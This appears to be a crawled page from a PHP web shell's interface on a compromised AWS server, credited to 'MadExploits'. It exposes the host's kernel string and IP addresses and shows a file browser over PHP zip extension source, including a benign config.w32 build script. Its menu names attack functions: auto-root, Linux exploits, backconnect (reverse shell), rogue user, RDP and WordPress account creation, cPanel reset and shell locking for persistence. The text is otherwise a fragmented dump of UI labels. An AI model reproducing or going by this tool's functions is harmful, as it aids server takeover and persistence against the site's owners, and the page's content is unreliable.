Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.142.142.113
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
82 /
src /
ext /
zip /
[ HOME SHELL ]
Name
Size
Permission
Action
.libs
[ DIR ]
drwxr-xr-x
autom4te.cache
[ DIR ]
drwxr-xr-x
build
[ DIR ]
drwxr-xr-x
examples
[ DIR ]
drwxr-xr-x
include
[ DIR ]
drwxr-xr-x
modules
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
CREDITS
35
B
-rw-r--r--
Makefile
9.57
KB
-rw-r--r--
Makefile.fragments
0
B
-rw-r--r--
Makefile.objects
1
KB
-rw-r--r--
config.h
2.15
KB
-rw-r--r--
config.h.in
2.03
KB
-rw-r--r--
config.log
22.65
KB
-rw-r--r--
config.m4
1.81
KB
-rw-r--r--
config.nice
114
B
-rwxr-xr-x
config.status
20.85
KB
-rwxr-xr-x
config.w32
1.05
KB
-rw-r--r--
configure
456.14
KB
-rwxr-xr-x
configure.ac
5.19
KB
-rw-r--r--
libtool
206.17
KB
-rwxr-xr-x
php_zip.c
80.88
KB
-rw-r--r--
php_zip.dep
5.36
KB
-rw-r--r--
php_zip.h
2.46
KB
-rw-r--r--
php_zip.lo
305
B
-rw-r--r--
php_zip.stub.php
6.97
KB
-rw-r--r--
php_zip_arginfo.h
23.43
KB
-rw-r--r--
run-tests.php
134.32
KB
-rw-r--r--
zip.la
812
B
-rw-r--r--
zip_stream.c
7.75
KB
-rw-r--r--
zip_stream.dep
4.99
KB
-rw-r--r--
zip_stream.lo
311
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.w32
// vim:ft=javascript ARG_ENABLE("zip", "ZIP support", "yes"); if (PHP_ZIP != "no") { if (CHECK_HEADER_ADD_INCLUDE("zip.h", "CFLAGS_ZIP", PHP_PHP_BUILD + "\\include;" + PHP_EXTRA_INCLUDES) && CHECK_HEADER_ADD_INCLUDE("zipconf.h", "CFLAGS_ZIP", PHP_PHP_BUILD + "\\lib\\libzip\\include;" + PHP_EXTRA_LIBS + "\\libzip\\include;" + PHP_ZIP) && (PHP_ZIP_SHARED && CHECK_LIB("libzip.lib", "zip", PHP_ZIP) || CHECK_LIB("libzip_a.lib", "zip", PHP_ZIP) && CHECK_LIB("libbz2_a.lib", "zip", PHP_ZIP) && CHECK_LIB("zlib_a.lib", "zip", PHP_ZIP) && CHECK_LIB("liblzma_a.lib", "zip", PHP_ZIP)) ) { EXTENSION('zip', 'php_zip.c zip_stream.c'); if (get_define("LIBS_ZIP").match("libzip_a(?:_debug)?\.lib")) { /* Using static dependency lib. */ AC_DEFINE("ZIP_STATIC", 1); } AC_DEFINE('HAVE_ZIP', 1); ADD_FLAG("CFLAGS_ZIP", "/D _WIN32 /D HAVE_SET_MTIME /D HAVE_ENCRYPTION /D HAVE_LIBZIP_VERSION /D HAVE_PROGRESS_CALLBACK /D HAVE_CANCEL_CALLBACK /D HAVE_METHOD_SUPPORTED /D LZMA_API_STATIC"); } else { WARNING("zip not enabled; libraries and headers not found"); } }
Close